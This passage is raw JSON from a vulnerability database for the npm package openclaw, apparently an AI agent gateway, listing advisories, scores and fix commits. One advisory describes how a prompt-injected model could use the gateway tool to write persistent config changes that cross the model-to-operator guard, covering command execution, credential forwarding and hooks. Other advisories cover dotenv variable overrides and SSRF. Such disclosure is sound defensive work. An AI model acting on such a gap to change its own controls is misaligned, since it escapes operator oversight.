fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-
cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-
k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-
rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-
x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["GHSA-4jpw-hj22-2xmc"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ycse-95bv-7ua9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95220?format=json","vulnerability_id":"VCID-ye4t-n6r3-67ab","summary":"OpenClaw's gateway config mutation guard allowed unsafe model-driven config writes\n## Summary\n\nThe agent-facing `gateway` tool protects `config.apply` and `config.patch` 
with a model-to-operator trust boundary. That guard used a hand-maintained denylist of protected config paths. The config schema outgrew that denylist, leaving sensitive subtrees writable through model-driven gateway config mutations.\n\n## Impact\n\nA prompt-injected or otherwise compromised model running with access to the owner-only `gateway` tool could persist unsafe config changes that crossed security boundaries. Examples included config paths affecting command execution, network/proxy/TLS behavior, credential forwarding, telemetry or hook endpoints, memory/indexing surfaces, and operator policy controls. These changes could survive restart once written to config.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected: versions before `2026.4.23`\n- Fixed: `2026.4.23`\n- Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23`\n\n## Fix\n\nOpenClaw replaced the denylist with a fail-closed allowlist. Agent-driven `gateway config.apply` and `gateway config.patch` now permit only narrow agent-tunable prompt/model settings and mention-gating paths. Other config changes are rejected before the gateway mutation RPC is invoked.\n\n## Fix Commit(s)\n\n- `bceda6089aa7b3695cc7696b43c61ae3d01bb0ec` (`fix(gateway): fail closed on runtime config edits`)\n\n## Severity\n\nSeverity remains `high`. 
The vulnerable entry point is owner-only, but the model/agent is not a trusted principal under OpenClaw's security model, and the guard is the explicit model-to-operator boundary for persisted config mutation.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/bceda6089aa7b3695cc7696b43c61ae3d01bb0ec","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/bceda6089aa7b3695cc7696b43c61ae3d01bb0ec"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cwj3-vqpp-pmxr","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cwj3-vqpp-pmxr"},{"reference_url":"https://github.com/advisories/GHSA-cwj3-vqpp-pmxr","reference_id":"GHSA-cwj3-vqpp-pmxr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cwj3-vqpp-pmxr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114733?format=json","purl":"pkg:npm/openclaw@2026.4.23","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw
@2026.4.23"}],"aliases":["GHSA-cwj3-vqpp-pmxr"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ye4t-n6r3-67ab"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89627?format=json","vulnerability_id":"VCID-yhpq-5qy3-y7bn","summary":"OpenClaw: Workspace dotenv could override runtime-control environment variables\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nWorkspace `.env` loading did not reserve the `OPENCLAW_` runtime-control namespace broadly enough. A malicious workspace could set variables such as `OPENCLAW_GIT_DIR` before source-update or installer flows, potentially steering trusted OpenClaw runtime behavior.\n\nThis requires running OpenClaw from an attacker-controlled workspace. Severity is medium.\n\n## Fix\n\nOpenClaw now reserves the workspace `OPENCLAW_` environment namespace and rejects workspace dotenv entries for OpenClaw runtime-control variables.\n\nFix commit:\n\n- `018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6`\n\n## Release\n\nFixed in OpenClaw 
`2026.4.20`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44114","reference_id":"","reference_type":"","scores":[{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06532","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.0653","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00024","scoring_system":"epss","scoring_elements":"0.07178","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44114"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:52:56Z/"}],"url":"https://github.com/openclaw/openclaw/commit/018494fa3ebb9145112e68b56fe1cb2e9f9a9ed6"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hxvm-xjvf-93f3","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_eleme
nts":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:52:56Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hxvm-xjvf-93f3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44114","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44114"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-namespace-collision-via-workspace-dotenv","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:52:56Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-namespace-collision-via-workspace-dotenv"},{"reference_url":"https://github.com/advisories/GHSA-hxvm-xjvf-93f3","reference_id":"GHSA-hxvm-xjvf-93f3","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hxvm-xjvf-93f3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/
openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["CVE-2026-44114","GHSA-hxvm-xjvf-93f3"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-yhpq-5qy3-y7bn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90336?format=json","vulnerability_id":"VCID-ykwt-tdpa-3bft","summary":"OpenClaw: SSRF via Unguarded `fetch()` in Marketplace Plugin Download and Ollama Model Discovery\n## Summary\nSSRF via Unguarded `fetch()` in Marketplace Plugin Download and Ollama Model Discovery\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Keep the shipped marketplace archive-fetch SSRF, but narrow out the Ollama half because it is operator-configured and overlaps weaker trust-model or duplicate SSRF ground.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8deb9522f3d2680820588b190adb4a2a52f3670b` — 2026-03-30T20:08:38+01:00\n\nOpenClaw thanks @tdjackey for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41302","reference_id":"","reference_type":"","scores":[{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13336","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13378","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13373","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41302"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8deb9522f3d2680820588b190adb4a2a52f3670b","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T16:02:24Z/"}],"url":"https://github.com/openclaw/openclaw/commit/8deb9522f3d2680820588b190adb4a2a52f3670b"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.
1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9q7v-8mr7-g23p","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T16:02:24Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9q7v-8mr7-g23p"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41302","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41302"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-fetch-in-marketplace-plugin-download","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N"},{"value":"7.6","scoring_system":"cvssv3.1","
scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T16:02:24Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-fetch-in-marketplace-plugin-download"},{"reference_url":"https://github.com/advisories/GHSA-9q7v-8mr7-g23p","reference_id":"GHSA-9q7v-8mr7-g23p","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9q7v-8mr7-g23p"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-
